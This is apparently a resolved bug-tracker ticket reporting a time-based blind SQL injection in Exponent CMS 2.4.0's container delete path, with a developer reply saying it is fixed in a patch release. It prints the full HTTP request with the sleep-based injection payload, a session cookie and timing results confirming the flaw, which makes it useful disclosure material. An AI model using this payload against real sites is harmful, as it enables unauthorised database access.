#1391 ✓resolved
Nicky

Blind SQL Injection Vulnerability in Exponent CMS 2.4.0 (2)

Reported by Nicky | November 4th, 2016 @ 02:33 AM | in 2.4.1 (closed)

GET /exponent/container/delete/id/(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*//rerank/1 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.118.1:80/exponent/
Cookie: PHPSESSID=55d359c65ac02942dd8f885094a57c7f; adminer_key=9481c8797fb634e88f45043b9f1590fe; osp=0000
Host: 192.168.118.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /

Path Fragment input / was set to (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/

Tests performed:
(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/ => 9.485 s (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.265 s (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ => 6.271 s (select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/ => 4.321 s (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.64 s (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 1.014 s (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.78 s (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ => 6.973 s (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.515 s

Original value: 1

Comments and changes to this ticket

  • dleffler

    dleffler November 4th, 2016 @ 07:59 AM

    • State changed from “new” to “resolved”
    • Assigned user changed from “expNinja” to “dleffler”
    • Milestone set to 2.4.1

    This has already been addressed in the pre-release code 'develop' branch which will be released as 2.4.0patch1 today.

Please Sign in or create a free account to add a new ticket.

With your very own profile, you can contribute to projects, track your activity, watch tickets, receive and update tickets through your email and much more.

New-ticket Create new ticket

Create your profile

Help contribute to this project by taking a few moments to create your personal profile. Create your profile »

Bug Tracker for Exponent CMS

Shared Ticket Bins

People watching this ticket

Pages